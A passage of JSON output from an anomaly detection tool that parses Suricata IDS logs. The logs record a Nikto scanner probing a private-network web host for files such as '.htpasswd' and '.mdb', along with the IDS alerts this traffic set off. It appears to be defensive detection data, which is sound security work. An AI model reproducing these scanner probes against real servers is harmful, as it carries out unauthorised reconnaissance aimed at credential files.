"/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46910,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46910, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":281440600897230,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 281440600897230, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.310454+0000\",\"flow_id\":281440600897230,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46910,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.asp\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.asp\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.31 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.312170 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46912 -> 192.168.10.154:80", "/parser/model/time": 1583349514.31217, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46912, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.312170 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46912 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.31 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.mdb", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.312371+0000\",\"flow_id\":1737271305486500,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46912,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.mdb\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.mdb\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.312371, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1737271305486500,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46912,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.mdb\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.mdb\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46912,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.mdb\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.mdb\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.mdb\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.mdb\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.mdb", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.mdb", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46912,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46912, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1737271305486500,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1737271305486500, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.312371+0000\",\"flow_id\":1737271305486500,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46912,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.mdb\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.mdb\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.31 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.314733 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46914 -> 192.168.10.154:80", "/parser/model/time": 1583349514.314733, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46914, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.314733 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46914 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.31 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.htpasswd", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.314940+0000\",\"flow_id\":220086993078258,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46914,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.htpasswd\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.htpasswd\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.31494, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":220086993078258,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46914,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.htpasswd\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.htpasswd\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46914,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.htpasswd\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.htpasswd\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.htpasswd\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.htpasswd\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.htpasswd", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.htpasswd", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46914,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46914, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":220086993078258,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 220086993078258, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.314940+0000\",\"flow_id\":220086993078258,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46914,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.htpasswd\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.htpasswd\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.31 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.316707 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46916 -> 192.168.10.154:80", "/parser/model/time": 1583349514.316707, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46916, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.316707 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46916 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.32 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.signature", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.316954+0000\",\"flow_id\":1437349444244092,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46916,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.signature\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.signature\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.316954, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1437349444244092,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46916,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.signature\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.signature\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46916,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.signature\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.signature\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.signature\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.signature\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.signature", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": 